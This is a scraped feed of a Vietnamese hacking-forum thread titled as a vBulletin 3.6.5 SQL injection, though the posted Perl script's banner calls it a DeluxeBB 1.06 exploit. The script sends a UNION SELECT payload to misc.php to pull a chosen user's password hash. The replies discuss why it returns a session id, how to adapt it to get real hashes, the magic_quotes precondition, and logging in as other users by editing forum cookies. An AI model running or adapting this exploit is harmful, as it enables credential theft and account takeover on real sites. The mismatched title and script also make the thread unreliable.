<![CDATA[Latest posts for the topic "Vbulletin 3.6.5 Sql Injection ! [misc.php]"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Vbulletin 3.6.5 Sql Injection ! [misc.php] Code:
#!/usr/bin/perl

use IO::Socket;


print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# 	exploit discovered and coded        #
#	   by KingOfSka                     #
#	http://contropotere.netsons.org	    #
#############################################
};

if (!$ARGV[2]) {

print q{
 	Usage: perl dbbxpl.pl host /directory/ victim_userid

        perl dbbxpl.pl www.somesite.com /forum/ 1


};

exit();

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

  if ($answer =~/(\w{32})/)
{

   if ($1 ne 0) {
    print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

       }
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";
]]> /hvaonline/posts/list/10222.html#58599 /hvaonline/posts/list/10222.html#58599 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#58653 /hvaonline/posts/list/10222.html#58653 GMT Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#58819 /hvaonline/posts/list/10222.html#58819 GMT Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#59274 /hvaonline/posts/list/10222.html#59274 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#60160 /hvaonline/posts/list/10222.html#60160 GMT Re: Vbulletin 3.6.5 Sql Injection ! [misc.php]

Siêu trộm wrote:
Hix, hôm nọ thử cái script này trên vbb 3.6.5 của mình (mình nhớ là chưa patch gì hết) thì nó cũng hiện hashed password đàng hoàng, hóa ra lại không phải password của mình, search thử giá trị đó trong DB thì rốt cuộc chỉ là 1 cái sessionid vừa được tạo, hìhì, may ghê :lol:)  
bạn ơi cho mình hỏi khi có đoạn code trên thì ta sử dụng như thế nào mình chưa hiểu rõ lắm bạn có thể mail cho mình học pm cho mình theo níck chat sau nhe moon_knight2006 và email: moon_knight2006@yahoo.com]]> /hvaonline/posts/list/10222.html#60165 /hvaonline/posts/list/10222.html#60165 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#60195 /hvaonline/posts/list/10222.html#60195 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#65302 /hvaonline/posts/list/10222.html#65302 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#66044 /hvaonline/posts/list/10222.html#66044 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#66941 /hvaonline/posts/list/10222.html#66941 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#72486 /hvaonline/posts/list/10222.html#72486 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php] /hvaonline/posts/list/10222.html#82874 /hvaonline/posts/list/10222.html#82874 GMT Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] bbsessionhash. Sửa các giá trị cookie (trong firefox) của bbpassword, bbuserid bbssessionhash thì ta sẽ đăng nhập được vào forum với userid đó. mình suy luận dựa vào cách sử dụng cookie lấy được qua xss nhưng chưa thử (không rõ có lấy được sessionhash không). Để khi nào rảnh sẽ test trên localhost]]> /hvaonline/posts/list/10222.html#83480 /hvaonline/posts/list/10222.html#83480 GMT Re: Vbulletin 3.6.5 Sql Injection ! [misc.php]

Siêu trộm wrote:
Hix, hôm nọ thử cái script này trên vbb 3.6.5 của mình (mình nhớ là chưa patch gì hết) thì nó cũng hiện hashed password đàng hoàng, hóa ra lại không phải password của mình, search thử giá trị đó trong DB thì rốt cuộc chỉ là 1 cái sessionid vừa được tạo, hìhì, may ghê :lol:)  
tại sao đoạn code đó chỉ lấy đc cái sessionid nhỉ ? muốn nó show ra passhash thực sự thì phải sửa đoạn code này làm sao ?
while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1."\r\n"; 
??? ps: điều kiện khai thác thành công thì magic_quote=off nha các đồng chí :-o) ]]> /hvaonline/posts/list/10222.html#83485 /hvaonline/posts/list/10222.html#83485 GMT Vbulletin 3.6.5 Sql Injection ! [misc.php]

phstiger wrote:
Cụ thể Passhash của VBB là: md5(md5($pass).$salt) 
Giống của IPB nhỉ :P]]> /hvaonline/posts/list/10222.html#83573 /hvaonline/posts/list/10222.html#83573 GMT